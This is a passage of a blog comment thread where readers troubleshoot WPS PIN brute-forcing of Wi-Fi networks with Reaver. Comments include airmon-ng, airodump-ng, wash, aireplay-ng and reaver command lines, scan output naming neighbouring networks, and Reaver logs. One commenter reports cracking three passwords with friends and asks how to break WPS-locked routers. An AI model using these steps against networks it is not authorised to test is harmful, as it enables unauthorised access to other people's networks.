  96. hans88 says:

    why when i start crack some wifi using the reaver it is not running as usually? the percent actually still 0.00%. but when i try to connect with other laptop and try used some key, the percent of reaver is working but slowly. plz answer my question.:(

  97. hans88 says:

    24 hours working and nothing just this messages, any help?

    (!) WPS transaction failed (code: 0×02) re-trying last pin
    (!) WARNING 10 failed connections in a row
    (+)Trying pin 12345670
    (+)Sending EAPOL START request
    (+) WARNING: Receive timeout occured
    (+)Sending EAPOL START request
    (+) WARNING: Receive timeout occured
    (+)Sending EAPOL START request
    (+) WARNING: Receive timeout occured
    (!) WARNING 25 sucessive start failures
    (+) Nothing done nothing to save
    (+) 0.00% complete @ date ( 0 seconds pin)
    (+)Trying pin 12345670
    (+)Sending EAPOL START request
    (+) WARNING: Receive timeout occured
    (+)Sending EAPOL START request

    plz answer CRAIG…the signal is good. i dont know what the problems..

    • bla says:

      From my experience, it can timeout with a good signal if there are multiple AP’s on the same channel interfering with each other. Signal strength isn’t always as it seems when it comes to interference, multipath, etc.

    • Greg says:

      show what commands you drive???

  98. juanito says:

    I wonder how good I can install the tool on backtrack 5R3 wpscrack as the reaver and bring it and not have to install it, please help me, thank you very much for this tool as good as the reaver but takes a while to give me my wpa on my router and for this reason I would like to try this tool, Greetings …

  99. hackkary says:

    We are trying reaver-1.4 for 2 weeks with my friends and we have 3 cracked Wi-fi passwd already. But my question is ;
    when set the comand [ wash -i mon0 ] and get the targets with WPS locked “yes” , is there anybody cracking the wps locked wi-fi passwords? If yes, it is appreciated for showing any method.. Thanks…

  100. Mcld says:

    Interface Chipset Driver

    wlan1 Atheros AR9271 ath9k – [phy1]
    wlan0 Broadcom b43 – [phy0]

    root@bt:~# airmon-ng start wlan1

    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!

    PID Name
    2785 dhclient3
    2790 dhclient3
    Process with PID 2790 (dhclient3) is running on interface wlan0

    Interface Chipset Driver

    wlan1 Atheros AR9271 ath9k – [phy1]
    (monitor mode enabled on mon0)
    wlan0 Broadcom b43 – [phy0]

    airodump-ng mon0

    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:26:4D:16:E4:67 -62 43 0 0 5 54e WPA TKIP PSK DARKANGEL_Netzwerk
    C0:25:06:A9:8C:62 -75 24 0 0 11 54e. WPA2 CCMP PSK FRITZ!Box Fon WLAN 7390
    68:7F:74:01:FA:FC -75 22 0 0 11 54 WPA2 CCMP PSK lufthaken
    C0:25:06:41:EE:4A -76 20 0 0 1 54e WPA2 CCMP PSK FRITZ!Box Fon WLAN 7112
    C0:25:06:DC:B0:A4 -77 21 0 0 1 54e. WPA2 CCMP PSK FRITZ!Box 6320 Cable

    BSSID STATION PWR Rate Lost Frames Probe

    (not associated) 54:26:96:84:0A:05 -71 0 – 1 38 27

    wash -i mon0 -C -s

    reaver -i mon0 -b 00:26:4D:16:E4:67 -c 5 -vv (WPS Locked =N)

    Sending WSC NACK
    [!] WPS transaction failed (code: 0×02), re-trying last pin
    [+] Nothing done, nothing to save.
    [+] 0.00% complete @ 2013-01-03 10:03:31 (0 seconds/pin)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0×02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0×02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response

    I am using TP-LINK TL-WN722N
    tested injection and it works, but not getting any ARP,
    I have ran this for the past 8hrs and still geting the same response.
    please can any one point me to what I doing wrong, and hoe to get this thig working.

  101. Paul says:

    Hi Craig

    Do you know why reaver starts on 90% every time I try it?

  102. clickmac says:

    Hi, i am testing out my router, to see the vunerability of it. And it appears my router is pretty damn awesome! I am using the reaver, and my commands are “reaver -i mon0 -b **** -vv –no-nacks -A” and i seem to be getting and error of “warning: receive timeout occured” when sending EAPOL start request. How can one get around this problem? When i even tried -t .25 because it gives 25 warnings of timeout. Then finally it gets through, and sending WSC NACK …then i get å next error with WPS transaction failed (code; 0×02), re-trying last pin..then the 25 warnings happens again, and the whole process repeats. How can i solve this? Thank you craig and anyone else in advance for helping me.

  103. Etienne Ferreira says:

    Hi can someone please help me. when i run the command for reaver to start it allways starts around 90% and not 0% and if it gets to 99% it just do the same number over and over

  104. Zyxel says:

    Hi everyone
    I had this error:”” warning detected ap limiting waiting 60seconds befor re-checking”” how can solve this issue??
    tnx

  105. wilster_cisco says:

    This works for me:

    enable mon0
    airmon-ng start wlan0

    Check for the wps enabled wpa wifi : use command:
    #wash -i mon0 -C

    set your channel to the same AP in whiich you are interested
    #iwconfig mon0 channel

    start aireplay
    #aireplay-ng mon0 -1 120 -a -e

    start reaver
    #reaver -i mon0 -A -b -v

    or

    reaver -i mon0 -b (ssid) -T 1 -f -N -S 1 -vv

  106. shreeram says:

    it says [+] waiting for the becon from 60:D8:19:21:63:91 . is it normal ? i am not getting any other output . should i wait ? how much long i have to wait for the output to come ?

  107. I used to be recommended this blog by means of my cousin.
    I’m not certain whether this publish is written by way of him as nobody else recognise such unique approximately my difficulty. You are incredible! Thanks!

  108. boat says:

    cant get pass through the locked router each time i get ap rate limitings

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>